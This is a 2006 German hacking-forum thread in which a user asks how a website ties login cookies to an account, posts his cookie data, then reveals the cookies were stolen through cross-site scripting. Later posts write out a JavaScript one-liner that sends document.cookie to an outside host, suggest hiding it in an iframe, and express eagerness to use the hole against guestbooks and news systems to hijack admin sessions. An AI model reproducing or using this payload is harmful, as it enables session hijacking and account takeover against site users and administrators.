Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
(In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene.

An was erkennt die Seite ob meine Cookies stimmen?

Diskussion: An was erkennt die Seite ob meine Cookies stimmen? im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige Ich hab mal wieder paar Probleme mit Cookies ;) Also,erst mal alle Cookies der Seite in der Lokalen Cookiedatei: ...

Antwort
Alt 19.01.06, 16:11   #1 (permalink)
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Smile An was erkennt die Seite ob meine Cookies stimmen?

Anzeige

Ich hab mal wieder paar Probleme mit Cookies ;)
Also,erst mal alle Cookies der Seite in der Lokalen Cookiedatei:

Code:
.seite.de	TRUE	/	FALSE	1137684015	__utmb	79435669
.seite.de	TRUE	/	FALSE	2147385600	__utma	79435669.953149259.1134761371.1137680812.1137682216.89
.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D
.seite.de	TRUE	/	FALSE	1152013888	__utmz	79435669.1136245889.58.2.utmccn=(organic)|utmcsr=google|utmctr=nudelkind|utmcmd=organic
.www.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D
So,mehr steht nicht in der Cookiedatei...
Wenn ich jetzt auf der Seite meine Cookies via document.cookie ausgeben lasse kommt folgendes:

Code:
auth=TlJcVx5GSURJEk5ZFVVGRh1VVhxVTB4UUFwUXRheR3dOBAADAg1IHUhTTxwVTk1VTlVQG05DQBpYRVwa;%20session=4x%7CBW;%20__utma=79435669.1421511096.1137259645.1137524527.1137528250.6;%20__utmb=79435669;%20__utmz=79435669.1137259645.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);%20auth=TlJcVx5GSURJEk5ZFVVGRh1VVhxVTB4UUFwUXRheR3dOBAADAg1IHUhTTxwVTk1VTlVQG05DQBpYRVwa;%20__utmc=79435669
Jetzt mal meine Frage:Kann jemand erkennen an was einen díe Seite wiedererkennt?Also an was sie erkennt unter welchem Namen man sich eingeloggt hat?

Danke im voraus,
Xalon
Xalon ist offline   Mit Zitat antworten
Alt 19.01.06, 17:27   #2 (permalink)
 
Benutzerbild von Lord_Nykon
 
Registriert seit: 04.03.04
Lord_Nykon Leistung: Facit NTK
Likes: 0
Standard

also sehr oft wird in dem cookie nur ein session key abgelegt, zu welchem passend die daten nicht im cookie sondern auf den jeweiligen servern liegen.

Sagen wir mal ich bin ein Server ( ) und du kommst jetzt mit deinem Namen bei mir vorbei...dein name speichere ich dann und gebe dir einen Session-key (unter dem ich den namen wiederfinden kann...macht natürlich erst sinn bei informationen, die etwas umfangreicher sind als Namen). So ähnlich als wenn du ne URL eingibst. In der URL sind ja auch nicht die Webinhalte der Seite gespeichert, sondern es ist nur die Adresse, die auf den Inhalt der Seite verweißt.

MfG
Lord
Lord_Nykon ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 19.01.06, 19:27   #3 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Jaja,keine Angst,das weiß ich schon^^
Nur variablen wie __utmb __utma __utmz und auth werden ja immer gespeichert,also frage ich mich wo die Seite den Sessionkey hernimmt o_O

Hierher vielleicht:
Code:
.www.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D
Naja das gleicht ja fast
Code:
.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D
oder hier im Cookieoutput mit Java is vollgendes:

Code:
session=4x%7CBW;
Wo wird das gespeichert?In der Cookiedatei is des net...Wo dann?

Oder is das ne besondere Variable?

Also meine Frage wo spiechert der Server den Authentication-Cookie?

Danke im Voraus,
Xalon

P.S.:
@Lord_Nykon:Biste n Apache odern ISS? xD
Xalon ist offline   Mit Zitat antworten
Alt 19.01.06, 23:25   #4 (permalink)
 
Benutzerbild von Lord_Nykon
 
Registriert seit: 04.03.04
Lord_Nykon Leistung: Facit NTK
Likes: 0
Standard

Okay, dann tut's mir Leid.
Da habe ich deine Frage ein wenig falsch verstanden^^ Sorry.

Da kann ich leider im Moment nicht weiterhelfen.

MfG
Lord

P.S.: Weder noch Ich bin mein eigener Server mit dem Namen HNS aka "Human Network System" *scnr*
Lord_Nykon ist offline   Mit Zitat antworten
Alt 20.01.06, 22:02   #5 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Hmm,
und kann mir wer anders helfen?Wär echt wichtig

Xalon
Xalon ist offline   Mit Zitat antworten
Alt 21.01.06, 10:05   #6 (permalink)
 
Registriert seit: 24.08.05
ElLute Leistung: Facit NTK
Likes: 0
Standard

also mit den spärlichen infos wirst du kaum infos bekommen die dir weiterhelfen... und server sind normalerweise nicht so blöd, dass sie sich von einem gefälschtem cookie linken lassen
ElLute ist offline   Mit Zitat antworten
Alt 21.01.06, 10:08   #7 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Zitat:
Original von ElLute
also mit den spärlichen infos wirst du kaum infos bekommen die dir weiterhelfen... und server sind normalerweise nicht so blöd, dass sie sich von einem gefälschtem cookie linken lassen
Und woher soll der Server das merken?Und welche Infos bracht ihr noch?

Xalon
Xalon ist offline   Mit Zitat antworten
Alt 21.01.06, 18:47   #8 (permalink)
 
Registriert seit: 24.08.05
ElLute Leistung: Facit NTK
Likes: 0
Standard

der server kriegt von dir eine ID die nach einem bestimmten algorithmus generiert wurde, also sieht er, obs eine ID von ihm ist... und dann sieht er in seiner Datenbank nach den dazu gespeicherten daten nach und schickt dir dann deine persönliche seite... so war glaub ich das konzept von cookies...
ElLute ist offline   Mit Zitat antworten
Alt 22.01.06, 13:03   #9 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Jap ich weiß den Cookie den ich schicke hab ich ja über XSS geklaut
Naja ich schreib mir ez einfach selbr ein Programm um dann die Cookies zu nutzen dann bracuh ich Firefox gar nimmer^^

Xalon
Xalon ist offline   Mit Zitat antworten
Alt 22.01.06, 19:30   #10 (permalink)
 
Registriert seit: 20.09.05
Nick H. Leistung: Facit NTK
Likes: 0
Standard

wie soll man den über XSS Cookies klauen?
Nick H. ist offline   Mit Zitat antworten
Alt 22.01.06, 19:41   #11 (permalink)
Member of Honour
 
Benutzerbild von ivegotmail
 
Registriert seit: 28.05.03
ivegotmail Leistung: Z3
Likes: 1
Standard

Zitat:
Original von Nick H.
wie soll man den über XSS Cookies klauen?
http://wiki.hackerboard.de/index.php...l_eins_Cookies
http://www.thegeek.de/blog/type/codi...f/post/68.html
__________________
http://livehabo.hackerboard.de | http://livebb.sourceforge.net
ivegotmail ist offline   Mit Zitat antworten
Alt 23.01.06, 13:28   #12 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Na indem man folgendes ausführen lässt:
location.href="blubb.de/save.php?to_save="+document.cookie
Noch besser natürlich in nem Iframe

Xalon

Edit:Ups hab ivegotmail's net glesen
Xalon ist offline   Mit Zitat antworten
Alt 23.01.06, 15:55   #13 (permalink)
 
Registriert seit: 20.09.05
Nick H. Leistung: Facit NTK
Likes: 0
Standard

also im prinzip geht es darum Code einzuschleusen,
sobald sich dann zB in einem Board ein Admin einloggt
wird dessen cookie gespeichert (per email an mich geschickt oder sowas)
und man hat die Zugangsdaten

hab ich das jetzt richtig verstanden?
Nick H. ist offline   Mit Zitat antworten
Alt 23.01.06, 16:03   #14 (permalink)
Themenstarter
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Nicht die Zugangsdaten sondern den Cookie

Xalon
Xalon ist offline   Mit Zitat antworten
Alt 23.01.06, 17:54   #15 (permalink)
 
Registriert seit: 20.09.05
Nick H. Leistung: Facit NTK
Likes: 0
Standard

stimmt, meinte ich auch eigentlich
man hat das cookie und dann hat man zugang

die Lücke gefällt mir
es gibt bestimmt n'paar Gästebücher, News-Systeme oder sonstwas,
bei denen sich das einfach ausnutzen lässt

bis jetzt hab ich immer nur an include() gedacht
Nick H. ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » (In)security allgemein » An was erkennt die Seite ob meine Cookies stimmen?
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Laptop erkennt anscheinend meine Festplatte nicht mehr WebSTAR Hardware Probleme 2 08.11.08 17:26
Netgear Router erkennt meine Netzwerkkarte nicht Heavyl Network · LAN, WAN, Firewalls 11 12.03.08 06:01
Erkennt meine 40GB HD, aber kein Zugriff möglich Santo Windows 6 24.02.04 14:36
XP erkennt meine Hardware (USB) nicht xGSxMalk Windows 2 24.04.03 22:27
Mandrake 8.1 erkennt meine Soundkarte nicht. rompastompa Linux/UNIX 1 07.07.02 19:22


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61